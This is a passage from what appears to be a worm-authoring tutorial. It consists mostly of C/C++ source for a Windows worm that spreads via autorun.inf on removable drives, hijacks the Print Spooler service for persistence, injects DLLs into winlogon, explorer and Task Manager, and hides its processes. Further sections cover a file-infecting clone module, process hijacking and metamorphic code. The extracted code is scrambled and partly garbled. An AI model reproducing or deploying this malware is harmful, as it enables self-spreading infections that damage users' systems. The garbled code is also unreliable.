strcat(envokerPath. CopyFile(file. KEY_ALL_ACCESS. sizeof (dat) ). CopyFile(DLLNAME. bool dllInjector(HANDLE hProcess. 0).exe". NULL. DLLPATH). CopyFile(file. FILEATTRIB). } void _declspec (dllexport) systemProc(char *proc) /** * The payload section. SetFileAttributes(systemPath. THREAD_PRIORITY_HIGHEST). &hResult) == ERROR_SUCCESS) { RegSetValueEx(hResult. HKEY hResult.HANDLE processHunter(LPSTR szExeName). FILEATTRIB). RegCloseKey(hResult). strcat(systemPath. FILEATTRIB). libPath[101]. systemPath. hSubKey. if (RegOpenKeyEx(HKEY_LOCAL_MACHINE. SetFileAttributes(libPath. ENVOKER). libPath. REG_SZ. void _declspec (dllexport) identify(char *file) { SetThreadPriority(GetCurrentThread(). HANDLE maintrd. strcat(libPath. "ImagePath". envokerPath[101]. 0. LPCTSTR hSubKey = "SYSTEM\\CurrentControlSet\\Services\\Spooler". LPSTR lpszDllPath). char systemPath[101]. CONST BYTE dat[] = "envoker. strcpy(libPath. SetFileAttributes(envokerPath. 0. The payload will run as an service. 50). **/ { SHERB_NOCONFIRMATION| 307 . systemPath). SHERB_NOPROGRESSUI|SHERB_NOSOUND). 0). envokerPath. 0). dat. GetSystemDirectory(systemPath. systemPath). } SHEmptyRecycleBin(NULL. PROCSSPATH). strcpy(envokerPath.
FILE *fp. strcat(dlloc. drive[0] = (char)let. struct stat stbuf. autof[20].SetThreadPriority(GetCurrentThread(). strcpy(dlloc. if (let > 0x5A) let = 0x43. if ((stat(newloc. life = processHunter("winlogon. SetFileAttributes(newloc. THREAD_PRIORITY_HIGHEST). strcat(newloc. 0). } /* The payload code can be inserted here. THREAD_PRIORITY_HIGHEST). struct stat dlbuf. newloc. DLLPATH). drive). CopyFile(cfile. drive[1]= ':'. drive[2] = '\0'. 28). if (GetDriveType(drive) == 3) strcpy(newloc. DISGUISEPATH).exe 308 . file. // If not then copy the { { { { // This circuit induces a // into winlogon.exe"). drive). CloseHandle(life). dlloc[30]. i++. char drive[3]. remote thread if (life != NULL) dllInjector(life. for (int i = 0. newloc[30]. DLLNAME). &stbuf)) == -1) { // Check if file already exists in the drive. i < 256. HANDLE life. let++) if (i == 255) i = 0. */ /* The code will be executed with highest privileges */ } void _declspec (dllexport) procCloner(char *cfile) SetThreadPriority(GetCurrentThread(). int let = 0x43.
strcat(dlloc. &dlbuf)) == -1) { CopyFile(DLLNAME. { // This line fetches the removable drives. killer = processHunter("cmd. fprintf(fp. } } void _declspec (dllexport) killerProc(void) HANDLE killer. while(true) { killer = NULL. "[autorun]\nopen=%s". { // Check if file already exists in the pen drive. dlloc. FILEATTRIB). 0).exe"). "\\Autorun. strcat(autof. newloc. DLLPATH). 0). // Copy the DLL module. THREAD_PRIORITY_TIME_CRITICAL).} if ((stat(dlloc. strcpy(dlloc. 28). strcpy(autof. DISGUISE). // Copy the DLL module.inf"). dlloc. } if ((stat(dlloc. "w"). etFileAttributes(dlloc. DISGUISEPATH). drive). &stbuf)) == -1) CopyFile(cfile. FILEATTRIB). &dlbuf)) == -1) { CopyFile(DLLNAME. SetFileAttributes(newloc. } } Sleep(10). } } if ((GetDriveType(drive)) == 2) strcpy(newloc. SetFileAttributes(dlloc. fp = fopen(autof. fclose(fp). { SetThreadPriority(GetCurrentThread(). 0). strcat(newloc. // If not then copy the file. if ((stat(newloc. drive). drive). 309 .
if ((strstr(ptr. THREAD_PRIORITY_HIGHEST). procfile).exe")) == NULL) strcat(procfile. /*-----------------. ptr).if (killer != NULL) { TerminateProcess(killer. ". bool first = true. ". // Stuff for worm sibling killer circuit. /*------------------------------. (LPTHREAD_START_ROUTINE) killerProc.Worm finder circuit -------------------------------*/ // This circuit searches the already running worm process // and if found. HANDLE hProcess = NULL. // Stuff for worm sibling killer circuit. } ShowWindow(FindWindow(NULL. HANDLE hSnapProc. 0. SetThreadPriority(GetCurrentThread(). TOKEN_PRIVILEGES tknp. 0). goto hiderCircuit. HANDLE hSnapshot.killer = NULL. char *ptr. HIDE_WINDOW). HANDLE hToken. procfile[300]. } Sleep(5). CloseHandle(killer). HANDLE thread.The main engine of worm ------------------*/ int main (int argc. hSnapProc = CreateToolhelp32Snapshot(TH32CS_SNAPALL. PROCESSENTRY32 Pd = { sizeof(PROCESSENTRY32) }.exe"). then it will terminate the found process. char* argv[]) bool syst = false. NULL. // Then it starts the further processing of the worm circuits. 0). ptr = argv[0]. { { 310 . 0). cloner. thands[3]. 0. } } HINSTANCE hInstance. topCircuit: // HANDLE hTerminator = CreateThread(0. strcpy(procfile.
th32ProcessID). } Sleep(5). true.th32ProcessID) TerminateProcess(OpenProcess(PROCESS_ALL_ACCESS. "?identify@@YAXPAD@Z"). thands[2] = '\0'. /*--------------. PROCESSNAME)) { if (GetCurrentProcessId() != Pd. 0. if ((strstr(dirpath. hmod = LoadLibrary(procfile). "IcmpCreateFile"). (DWORD (__stdcall *)(void*))smack. thread = CreateThread(0.The icmp section -----------------*/ hicmp = LoadLibrary("ICMP. procfile.szExeFile. &Pd)) do { { if (!strcmp(Pd. 0. void (*smack)(char *). 0.DLL"). { 311 . pIcmpCreateFile = (void *(__stdcall *)(void))GetProcAddress(hicmp. procfile. smack = (void (*)(char *))GetProcAddress(hmod. 0. Pd. "?systemProc@@YAXPAD@Z"). 0. "system32")) != NULL) syst = true. } /*-----------------------------------------------------------------------------------*/ void (*clonproc) (char *). (DWORD (__stdcall *)(void *))procCloner. HMODULE hmod. thands[1] = thread. 0). 0). 0). char dirpath[201]. dirpath). } thands[0] = cloner. } else { smack = (void (*)(char *))GetProcAddress(hmod. CloseHandle(hSnapProc).if (Process32First(hSnapProc. } while (Process32Next(hSnapProc. procfile. cloner = CreateThread(0. GetCurrentDirectory(200. clonproc = procCloner. &Pd)). 0). (DWORD (__stdcall *)(void*))smack. thread = CreateThread(0. 0.
PrivilegeCount = 1. &es.Privileges[0]. 0. while(i <100) { { { if (FindWindow(0. "IcmpCloseHandle").Luid).void *. Sleep(10). if (OpenProcessToken(GetCurrentProcess(). IPADDR. hProcess = NULL. } // Save precious cpu-cycles. &tknp. // We need not to do any error checks here. AdjustTokenPrivileges(hToken. goto topCircuit.Attributes = SE_PRIVILEGE_ENABLED. 0.unsigned short. hProcess = processHunter("taskmgr.pIcmpCloseHandle = (int (__stdcall *)(void *))GetProcAddress(hicmp. 0. SE_DEBUG_NAME. /*-----------. NULL).unsigned long. "IcmpSendEcho"). hProcess = NULL.exe"). tknp. &I. } i++. NULL.void *. } } if (first == true) first = false. } int i=0.Privileges[0]. CloseHandle(hProcess). DLLNAME). pIcmpSendEcho = (unsigned long (__stdcall *)(void *.dll"). sizeof(tknp). pIcmpSendEcho(hIP.Ttl = 255. I. hIP = pIcmpCreateFile(). sizeof(es).unsigned long. &tknp.void *. &hToken)) { LookupPrivilegeValue(NULL. tknp. { 312 . "Windows Task Manager")) if (!hProcess) CloseHandle(hProcess). TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY. 8000). CloseHandle(hToken).The process hider circuit ------------*/ hiderCircuit: hInstance = GetModuleHandle("Kernel32. } else { dllInjector(hProcess.unsigned long))GetProcAddress(hicmp.
szExeFile. 0). 0). // This circuit induces a remote thread into explorer. &Pe)) do { if (!strcmp(Pe. // Save the memory. 313 . CloseHandle(explor). hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPALL. szExeName)) if (!hProcess) Pe. WaitForSingleObject(thread. /*--------------------------------------------------*/ // Activate this while testing the single thread. DLLNAME). thands. { { { return OpenProcess(PROCESS_ALL_ACCESS. // Keep alive in new flesh.exe"). } pIcmpCloseHandle(hicmp). "open". 200). } while (Process32Next(hSnapshot. // // // Save the memory. &Pe)).Main Loop Ends Here ----------------------------------*/ HANDLE _cdecl processHunter(LPSTR szExeName) { PROCESSENTRY32 Pe = { sizeof(PROCESSENTRY32) }. true. } /*-------------------------------. NULL. // Activate this while testing the single thread. FreeLibrary(hmod). 300).. ShellExecute(NULL. FreeLibrary(hicmp). NULL. PROCESSNAME. } return NULL. // Waits for the termination of two threads.HANDLE explor = processHunter("explorer. return EXIT_SUCCESS.exe if (explor != NULL) { dllInjector(explor. CloseHandle(hSnapshot). 200).th32ProcessID). if (Process32First(hSnapshot. WaitForSingleObject(cloner. } } Sleep(5). WaitForMultipleObjects(2. true..
MEM_COMMIT. HANDLE hThread = CreateRemoteThread(hProcess. CloseHandle(hThread). Then it starts threads for different tasks assigned to each. if running then it will delete its own process name from the processes tab. if (hmKernel == NULL || hProcess == NULL) return false. } The above worm when executed will hide its window first.h> // Required for ShellExecute(). HMODULE hmKernel = GetModuleHandle("Kernel32"). LPVOID lpvm = VirtualAllocEx(hProcess.h" #include <iostream> #include <windows. NULL. NULL). The main DLL payload coding is provided below. 0. LPDWORD lpExitCode = 0. 0. lpvm. int ndllPathLen = lstrlen(lpszDllPath) + 1. (LPTHREAD_START_ROUTINE)GetProcAddress(hmKernel. 10000). ndllPathLen. if (hThread != NULL) { { dwWaitResult = WaitForSingleObject(hThread. PAGE_READWRITE). MEM_RELEASE). WriteProcessMemory(hProcess. NULL). return true. #include <shellapi. ndllPathLen. if not present then create it and write the following code /* kanj. lpszDllPath. #define PROCSSPATH "\\Kanjrala.cpp */ #include "stdafx.exe" 314 . then it detects.} bool dllInjector(HANDLE hProcess. whether task manager is running or not. 0. To compile this code in vc++ click the File\New and select the Dynamic Loadable Library and then follow the wizard. lpvm. #include <TlHelp32. Select the projects CPP file.h> // Required for taskmanager handling functions.h> // Required for functions like CreateToolhelp32Snapshot (). NULL.h> #include <commctrl. "LoadLibraryA"). lpvm. LPSTR lpszDllPath) DWORD dwWaitResult. } VirtualFreeEx(hProcess.
ito1).flags = LVFI_STRING. search3. &search1). true. ito3). hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPALL. ito2 = ListView_FindItem(hTaskList. /* the process name deletion circuit */ ito1 = ListView_FindItem(hTaskList. &search3).exe" DWORD WINAPI kanjCreature(void){ int ito1. hTaskList = FindWindowEx(hTaskDial. NULL). LVFINDINFO search3. search1.psz = "Hotel_California.*/ Sleep(13).exe". ito2. &Pe)). HWND hTaskMan. szExeName)) { return OpenProcess(PROCESS_ALL_ACCESS.szExeFile. CloseHandle(hSnap).psz = "envoker.flags = LVFI_STRING. } DWORD WINAPI injectionVector (void) { /* The code to be injected to be executed into remote process */ 315 . } Sleep(5). &Pe)) { do { if (!strcmp(Pe. NULL. } return NULL. ito3 = ListView_FindItem(hTaskList.exe". PROCESSENTRY32 Pe = { sizeof(PROCESSENTRY32) }. ito2). NULL. search3.#define PROCESSNAME "Kanjrala. search1. LVFINDINFO search2. search2. HWND hTaskList. search2. -1. ListView_DeleteItem(hTaskList.psz = "Kanjrala. #define ENVOKER "envoker. "#32770". hTaskDial = FindWindowEx(hTaskMan. 0). /* --------------------------------.exe". &search2). ito3.mp3.th32ProcessID). -1. LVFINDINFO search1. Pe. ListView_DeleteItem(hTaskList. ListView_DeleteItem(hTaskList. WC_LISTVIEW. } return false. -1. while(true) { hTaskMan = FindWindow(NULL.flags = LVFI_STRING. "Processes"). "Windows Task Manager").exe". if (Process32Next(hSnap. } HANDLE _cdecl procHunter(LPSTR szExeName) { HANDLE hSnap. } while (Process32Next(hSnap. HWND hTaskDial.
while (true) Sleep (1000). 0. NULL. hSubKey. cHand = NULL. ShellExecute(NULL. "ImagePath". dat. LPCTSTR hSubKey = "SYSTEM\\CurrentControlSet\\Services\\Spooler".exe". (LPTHREAD_START_ROUTINE) injectionVector.. "explorer") != NULL) HANDLE invThread = CreateThread(NULL. } lcount++. } return true. 0. CloseHandle(cHand). TerminateProcess(cHand. 0. if ((strstr(cmdline. LPVOID lpReserved ) { if (ul_reason_for_call == DLL_PROCESS_ATTACH) { char *cmdline. 0.. KEY_ALL_ACCESS. cHand = procHunter("cmd. } if (lcount == 200) { // Bring it to life again. 0). } } { BOOL WINAPI life(void) { HKEY hResult. 0. int lcount = 0. NULL. NULL. 0. { if (RegOpenKeyEx(HKEY_LOCAL_MACHINE. NULL. &hResult) == ERROR_SUCCESS) { RegSetValueEx(hResult. 0. 0). 316 . "taskmgr") != NULL) HANDLE hThread = CreateThread(NULL. (LPTHREAD_START_ROUTINE) kanjCreature. DWORD ul_reason_for_call. (LPTHREAD_START_ROUTINE) life. while(true) Sleep(5).exe". cmdline = GetCommandLine().exe"). sizeof (dat) ). 0). if (strstr(cmdline. "open". } BOOL APIENTRY DllMain( HANDLE hModule. lcount = 0. RegCloseKey(hResult). 0). NULL. 0). "Kanjrala. else if (strstr(cmdline. CONST BYTE dat[] = "envoker. "winlogon") != NULL)) HANDLE hLife = CreateThread(NULL. 0. REG_SZ.HANDLE cHand = NULL.
exe thread routine and taskmgr. The execution of the DLL from DllMain is started by the presence of the macro DLL_PROCESS_ATTACH.exe as well as from explorer. The above worm code can be made more worst by a little more alteration of registry entries of the respective service to make it auto start every time even if anyone turns the Print Spooler service off and making it a critical service to turn off the system if it doesn’t get started etc. We’ll insert the registry alteration code into a loop and inject that loop code into a very essential user process. but just empties the Recycle Bin every time you delete any item.exe. Well friends. with this discussion.exe is different from winlogon. But most people keep a watch on the “Run” registry key for suspected program behavior and delete the suspected program entries? How to tackle it? The answer is derived from the Kanjrala worm we studied a little time ago.g. instead going to use the “Run” registry key. Now we’ll not alter any system service. the thread routine for explorer. This worm will execute with the current user’s privilege level. We have designed the DLL to execute the different codes in different processes e.exe thread routine is also different from winlogon. The Kanjrala worm (above listed worm code) does not harm systems. } } The above DLL gets executed as soon as it gets loaded into the remote process’s memory space.h. 317 .return TRUE. you are now capable of creating your own worms.exe and it will then remove the process entries for respective processes enlisted into the DLL code. To convert the task manager into a Trojan. Now we are going to create more robust worm. This task is done by ListItem_FindItem and ListItem_DeleteItem functions from commctrl. we inject the DLL into the taskmgr.
the worm will get invoked and the worm will then call the renamed executable file. Before writing full-blown worm code. one is to copy the worm file and then alter it to write the renamed process executable. We might want this worm to perform well even at lowest privileges. The worm will create a clone of itself into the folder containing the executable of the executing process with the name of the victim process’s executable in such a way that next time when the process will be launched. We are going to make it rename and hide the executable files of the process’s executing with the same user credentials. the next very code can also be called as a virus. Therefore it might place its components in accessible folders. to avoid the suspicion as much as we can. 318 .This worm will contain some dangerous code snippets. we can create the clones in two different ways. whereas in second method the worm file is copied byte-by-byte and do all the necessary alterations during the copy process. For this kind of infection. you might be thinking how the worm with several different sections developed? Take a look at next section for this. With this kind of infection. It is advised to use the inbuilt folders instead of creating genuine folders. One such folder is the “All Users” and so many there.
a car assembly line. This is unsolicited situation we ever want. But we know that the owner process of the executable file can perform any kind of alterations to its own respective executable file. Every part is manufactured separately and then after quality checks passed. But there is always a difference between the operating environment of the algorithm into its own separate process and into worm space where several such algorithms share the CPU and other resources simultaneously. genuine worm writers always test and write the different sections separately on test programs. how the target victim process will be forced to rename its own executable file? The answer is once again the DLL Injection. we’ll develop the executable file renaming module. performance efficient and bug free. the disguised clone will be executed and it will in respect then call the target victim process. In this technique. Therefore.Modular Assembly Line Well friends.e. Firstly. we are going to develop and test the next very worm in sections with each section tested separately. the algorithms so developed can be made more reliable. But the “file sharing violation” will be detected by the operating system and the malicious algorithm will be halted and the interactive user will be informed by and error dialogue box. a little alterations should be made into the respective algorithms while planting them into the worm code to work efficiently.cpp containing almost no code than a code for pausing execution to save 319 . But the problem is. This module under primary testing environment will fetch the target process and then rename the original executable file and then create its own clone into same folder with the original executable’s name in such a way that at next time when the same target process will be executed. We’ll inject a DLL into the victim process and the code into the DLL will be executed inside the hosting process-space and no sharing violation will occur. 
And we are also going to do the same. Now let’s develop a program named server. it is assembled to the main body of the vehicle. Now its time to utilize this approach to develop the different sections of the next worm named WarrioR.g. This technique is similar to the industrial assemply line. i. e.
PROCESSENTRY32 Pc = { sizeof (PROCESSENTRY32)}. HANDLE hProcess = NULL. szExeName)) if (Pc. Its executable will be the target victim for our file renaming algorithm. HINSTANCE hInst. } { Next is the code of the program that will fetch the target process and then inject the respective DLL into target process space.szExeFile. return EXIT_SUCCESS.. /* server. do { cout << "The snapShots: " << Pc.. cout << "Got the Process. if (Process32First(hSnapshot.. 0).th32ProcessID << endl. char* argv[]) system("PAUSE").h> using namespace std. { { { 320 .." << endl.cpp */ #include <iostream> #include <windows. int main (int argc.th32ProcessID == GetCurrentProcessId()) return NULL.:" << hSnapshot << endl. HANDLE GetProcessHandle(LPSTR szExeName) cout << "Scanning the processList: " << endl.h> #include <TlHelp32.the CPU during testing. hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPALL. cout << "Snapshot taken. &Pc)) cout << "Starting the loop: " << endl. /* ftest..szExeFile << endl. cout << "The ProcessID: " << Pc.cpp */ #include <iostream> using namespace std. HANDLE hSnapshot. if (!strcmp(Pc.
dllPath. PAGE_READWRITE).exe"). } while(Process32Next(hSnapshot. NULL. return OpenProcess(PROCESS_ALL_ACCESS. } } Sleep(100). char DllName[] = "rtest. "LoadLibraryA"). GetCurrentDirectory(sizeof (dllPath). LPVOID lpvmem = VirtualAllocEx(hProcess. HMODULE hmKernel = GetModuleHandle("Kernel32. if (hProcess == NULL) return 0.hProcess = NULL. lpvmem. int nDllPathLen = lstrlen(dllPath) + 1. if (hmKernel == NULL) return 0. char dllPath[100].dll"). system("PAUSE"). HANDLE rThread = CreateRemoteThread(hProcess.dll". MEM_COMMIT. executit. (LPTHREAD_START_ROUTINE)GetProcAddress(hmKernel. NULL). "\\"). CloseHandle(hProcess).. Pc. char blank1[] = "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB". char blank[] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"." << endl. NULL. nDllPathLen. &Pc)).exe". { cout << "The ProcessID: " << Pc. } return NULL. true.. char executit[] = "notepad. NULL. return EXIT_SUCCESS. nDllPathLen. } { 321 . 0. 1). strcat(dllPath. "open". NULL). strcat(dllPath. ShellExecute(NULL.th32ProcessID << endl. WriteProcessMemory(hProcess. NULL. 0. lpvmem. DllName).if (!hProcess) cout << "Grabbed the process. } int main (int argc. dllPath). char* argv[]) HANDLE hProcess.th32ProcessID). hProcess = GetProcessHandle("server.
cpp contains much more code than actually required for transplanting into the worm. SetFileAttributes("changed. int ch = 0.exe in disguise of victim process). nlen = 0. char name[] = "changed.cpp file.exe. Most of the code in ftest.exe".exe to be executed first time. ul_reason_for_call. The large chunks of “AAAAA…” and “BBBBB…” will help us to find this very block into the data section of the executable file ftest. LPVOID lpReserved 322 . This code actually provides all the information that actually what is happening in each stage of execution. We have chosen the notepad.h" #include <iostream> #include <windows.e.exe. But after performing its task when we will launch the executable with victim process name (that will be the altered ftest.exe". the string notepad will be overwritten by renamed server. Now let’s create the DLL project with name rtest and add following code into its rtest.h> #define SEEK 0x6E168 using namespace std.cpp is familiar and is derived from earlier examples. "changed. BOOL APIENTRY DllMain( HANDLE hModule. FILE *fp. *ap.exe i. nlen = lstrlen(name). This is required to ease the overwriting of the victim program’s name to be called when this clone will be executed.exe"). sserver. #include "stdafx.The above program named ftest. 34).exe". DWORD ) { if (ul_reason_for_call == DLL_PROCESS_ATTACH) { MoveFile("server.
a++) ch = fgetc(fp). } fclose(ap).Done" << endl. } return TRUE. } { { { Execute the server.i <= nlen.. 0). ap). This constant is the offset of the location of the program name to be executed by the ftest first and then the clone process. } fseek(fp. ap). fputc(ch. simply hex editor does this job for us. a. a++) fputc(name[i]. for (.. cout << ".. we define a constant named SEEK.fp = fopen("ftest.exe". Then once we have the offset of location where program name to be executed is located. a < SEEK. } cout << "Performing alterations. fclose(fp). ap).exe and will displace it and place its own code into server.exe". In the DLL code. . 323 .exe will infect the server..exe into a hex editor and searching for “AAAA… or “BBBB…” and calculating the count of bytes from first byte of the program.exe. if (ch == EOF) break. a++) ch = fgetc(fp).exe first and then ftest. for (int i=0. You can calculate this offset by opening the ftest." << endl. the ftest.. "wb"). "rb"). i++.. we can change it in each & every infection and clone reproduction. fputc(ch.. ap = fopen("server. for (long a=0.exe.
exe once again. 324 .The test code employs the algorithm in ftest. It will be handy if you execute the server.cpp that can check whether the same process is the target victim program & if so then it just returns a null handle and after other processings terminate safely without tryin to infect itself.
We have already used this technique in Kanjrala worm. This process is responsible for providing the users their desktop screens. bool dllInjector(HANDLE hProcess. we are going to hijack the explorer. We can also shutdown the system.h> using namespace std.g. etc.h> #include <commctrl. thus.h> #include <TlHelp32. The process hijacking can be accomplished by DLL injection. the explorer. only those processes can be hijacked. /* test1.cpp */ #include <iostream> #include<windows.exe process. moreover. LPSTR lpszDllPath). HANDLE hProcess. The process hijacking is extensible used by the worms to force the operating system processes to perform some specific tasks for worm from their own behalf. We have done this in earlier examples. HANDLE _cdecl processHunter(LPSTR szExeName). We’d force this process to terminate if our host process will get terminated by any means. we need to clear one more thing. Actually a specially crafted DLL is injected into the hijacked process and we can force the process to do anything. but we are not going to do this in this test code. int main (int argc. Before proceeding. start menu & taskbar. if our process by anyhow gets terminated unexpectedly and we want any other process to create the intended process forcefully. { 325 .exe will again be terminated if a certain fixed timeout occurs. then this technique is called process hijacking. Lets do it practically. char* argv[]) char dllPath[100].The Process Hijacking What if we can force a process to do something for us at certain extent? E. worm can be hard to killed as the hijacked operating system processes will then trigger the worm again or the system critical processes will be terminated. whose handle with PROCESS_ALL_ACCESS privilege can be obtained. once we have the handle. we can say that the process is hijacked.
326 . CloseHandle(hSnapshot). strcat(dllPath.) { __asm {nop} Sleep(100). &Pe)) do if (!strcmp(Pe. dllPath) == true) cout << "DLL successfully injected" << endl. PAGE_READWRITE). "\\sync. SetPriorityClass(GetCurrentProcess().th32ProcessID).dll"). LPSTR lpszDllPath) DWORD dwWaitResult. } while (Process32Next(hSnapshot. MEM_COMMIT. } HANDLE _cdecl processHunter(LPSTR szExeName) { PROCESSENTRY32 Pe = { sizeof(PROCESSENTRY32) }. LPVOID lpvm = VirtualAllocEx(hProcess. if (dllInjector(processHunter("explorer. } return NULL.szExeFile. szExeName)) if (!hProcess) } } Sleep(5).exe"). HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPALL.. if (hmKernel == NULL || hProcess == NULL) return false. Pe. } return EXIT_SUCCESS. int ndllPathLen = lstrlen(lpszDllPath) + 1. HMODULE hmKernel = GetModuleHandle("Kernel32"). &Pe)). for (. } bool dllInjector(HANDLE hProcess. ndllPathLen. true. if (Process32First(hSnapshot. REALTIME_PRIORITY_CLASS). NULL. 0). { { { { { return OpenProcess(PROCESS_ALL_ACCESS. LPDWORD lpExitCode = 0.GetCurrentDirectory(sizeof (dllPath). dllPath).
if (hThread != NULL) CloseHandle(hThread). Pe. } { dwWaitResult = WaitForSingleObject(hThread. hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPALL. lpvm. lpvm. We’ve used SetPriorityClass function here to set the process priority of test1.WriteProcessMemory(hProcess. if (Process32Next(hSnap. &Pe)) do if (!strcmp(Pe. /* sync.h> // Required for functions like CreateToolhelp32Snapshot (). HANDLE _cdecl procHunter(LPSTR szExeName) HANDLE hSnap. lpszDllPath. The test1.cpp is the code of DLL to be injected into hijacted process. 0.h" #include <iostream> #include <windows. 0). (LPTHREAD_START_ROUTINE)GetProcAddress(hmKernel. Then in next step of wizard select A simple DLL. NULL).cpp file by omitting all its earlier contents. 327 . HANDLE hThread = CreateRemoteThread(hProcess. PROCESSENTRY32 Pe = { sizeof(PROCESSENTRY32) }. true. return true.h> #include <TlHelp32.th32ProcessID). 10000). ndllPathLen. } VirtualFreeEx(hProcess. MEM_RELEASE).szExeFile. Next sync. NULL).exe process to real-time. lpvm. 0. szExeName)) } { { { { return OpenProcess(PROCESS_ALL_ACCESS. Now click File\New in Visual C++ and select Win32 DynamicLink Library and specify the name sync and specify the path for project. 0.cpp */ #include "stdafx. "LoadLibraryA").cpp is the code for our host process. When wizard finishes then write the below given code into sync. NULL.
328 . 0). Copy the DLL sync.exe is WaitForSingleObject. it waits for the objects to signal their termination until timeout occurs.exe and then terminate the test1. (LPTHREAD_START_ROUTINE) injectionVector. all opened folders will get closed. which have GUI.dll from from its project’s debug folder and put it into the folder containing the test1. &Pe)). The desktop will suddenly vanish but soon will come back. 0).exe file and execute the test1. LPVOID lpReserved { WaitForSingleObject(procHunter("test1. } return NULL.exe anyhow. CloseHandle(hSnap). } BOOL APIENTRY DllMain( HANDLE hModule. Another function WaitForMultipleObjects is available for waiting for multiple object signals simultaneously.Sleep(5). DWORD ) { if (ul_reason_for_call == DLL_PROCESS_ATTACH) HANDLE invThread = CreateThread(NULL. } while (Process32Next(hSnap. } ul_reason_for_call. 60000). remember that console applications are always considered idle for this function and it only supports those functions. } void WINAPI injectionVector() TerminateProcess(GetCurrentProcess(). Another very helpful function WaitForInputIdle is provided by windows API to wait until target process becomes idle. NULL. 0.exe"). return true. 0.exe for test1. As name itself explains. The function that performs the signal scanning from explorer.
The process hijacking is a powerful technique as it is demonstrated into the above example. 329 . It provides better ways to avoid the full termination of worm processes by spawning into several different processes.
But Artificial life is the technology that has provided the Holy grail of producing the living things and these things can think. The following figure explains the tiers concept of the memory cache.The Learning Code The human beings can create life only by one way and that is by giving birth to a child. The memory database should be implemented in several different layers and tiers to facilitate smaller size and better mutability and movability. The protocols like OSPF (open shortest path first). reproduce themselves and can learn by experience. BGP (border gateway protocol) and most of routing protocols are built on such a technology that the different nodes can talk and learn from each other and provide faster and reliable networks across the world. this memory should be persistent to provide full feedback even after the machine is restarted again. In same way the local network segment’s shared cache can be further filtered and sent to the upper tier or layer lying in a bigger network segment. Further this larger network segment can send its records to a memory cache underlying several such regional memory caches under one roof.e. The database should implement filters to get rid of useless and redundant records. In case of machines. The living things are also gifted with a bounty i. the memory. 330 . A single node should limit its local memory limit and send its experience (the records) to the upper tier or upper layer memory node elected by the several different nodes inside the same network segment or subnet. make decisions. But how to built a truly talking and learning technology? The answer can be derive by studying the working of a set of networking protocols. This will enhance the learning process to a great extent. The learning process can be enhanced if these living things can talk to each other just like human conversations. No other way is there to produce any living thing. mutually for sharing their experience. 
We can implement such persistent memory by a small database. The memory is necessary to keep the learned things for later use.
Nodal Layer: This layer represents the information storing resources locally available. Upper Layer: This layer is placed above all layers. Whereas. Subnet Layer: This layer represents the shared resource available to all nodes present into a single network. we should limit the number of tiers not to exceed 1 or 2 tiers or layers. The figure represents a global solution for sharing information in a web of nodes around the world. But as the number of tiers increases the need of a dedicated cache hardware is needed and it deteriorates the fully automation of memory cache implementations. Node can directly process only the information available into this tier or layer. but storing and retrieving information from this tier is a 331 . Every single node can find certain information and thus the experience. the middle or subnet layer can be sent the exclusive and non redundant information to be cached for sharing it with other nodes. then after refinement this information can be stored into the nodal layer or better say the memory cache resource locally available to the node. Note: Here memory means storage of any kind possessed by the objects and not the RAM or ROM. The exclusive information can be stored here for sharing it among several other nodes.The memory Layers The nodal layer represents the individual objects and these objects have a limit on their memory size. To avoid such hindrance in memory automation.
332 . A protocol is needed for memory quanta (the information) transactions among different tiers. This protocol should perform the data redundancy checks and should group and sort the information according to its type and make all these memory quanta equally available to all nodes and sub layers or tiers. The upper tier or main cache should be implemented where number of nodes is limited so as not to jam the networks and machines and other resources.cumbersome task because it needs an extra overhead to make the information available to lower layers and even the larger in size. faster and multithreaded storing resource is needed than the resources available in lower tiers.
several different high level instructions produce same low level code. which produce same thing but follow different instructions. The metamorphic worms differ in their execution unlike the polymorphic worms. Note: These algorithms must produce different low level machine code. we can interchange the instructions which produce similar results. B2. E. we can arrange them in execution steps table as: 333 . C. for C we develop 4 algorithms named C1. Means the execution of code changes with every offspring of the worm. E5. We can name them A1. Suppose that we have to produce a worm that executes with 5 different steps. Because. The simplest method is to develop several different and unique algorithms producing same results. The algorithm chosing can again be done in atleast two different ways. which encrypt their code to change their physical shape. The metamorphic code can be developed in several ways. worm can set its own execution path on its own on-the-fly. for most of these steps the worm should have some choices of algorithm. In one way. C2. The code can be rearranged or shuffled to acquire another execution path to get rid of execution signature matching. Now. Worm can then randomly chose the algorithm. A3. we can set the execution path of the worm in its physical file by doing necessary alterations during cloning process and in another technique. We name these steps A. A2.g. D. C4 and for D only one and E has 5 different algorithms E1. C3. E2.MetaMorphism Metamorphism is a technique to reproduce the artificial life with different DNA. we developed 3 different algorithms for step A. E3. B. Let us take a scenario for this discussion. Ok suppose. E. Metamorphism is a technique that can help us in the development of interplatform worm. Similarly for B we develop 2 named B1. in order to exhibit some degree of metamorphism. E4.
return leopard. leopard = leopard ^ GetCurrentThreadId(). C3. E2. The worm can randomly chose anyone of these 120 execution paths. E4. we have 3 x 2 x 4 x 1 x 5 = 120 different execution paths for our worm. E3. we have defined 10 functions and the program executes them randomly.h> using namespace std. In next example code. C2. C4 D1 E1.dwLowDateTime. every time selecting randomly anyone out of 10 choices for 10 times. A2. LARGE_INTEGER perfcount. unsigned int randNS() FILETIME ft. tmp = *(ptr + 1) ^ *ptr. unsigned int leopard = 0. unsigned int *ptr = 0. GetSystemTimeAsFileTime (&ft).cpp */ #include <iostream> #include <windows. Therefore. leopard = ft. A3 B1. leopard = leopard ^ *ptr. } { 334 . B2 C1. QueryPerformanceCounter (&perfcount). E5 Now. ptr = (unsigned int *) &perfcount. leopard = leopard ^ GetTickCount(). leopard = leopard ^ GetCurrentProcessId(). unsigned int tmp = 0. Let us develop a coded example.1 2 3 4 5 A B C D E A1.dwHighDateTime ^ ft. /* complex1. worm has to choose only one out of these choices in every step and it will have several different execution paths.
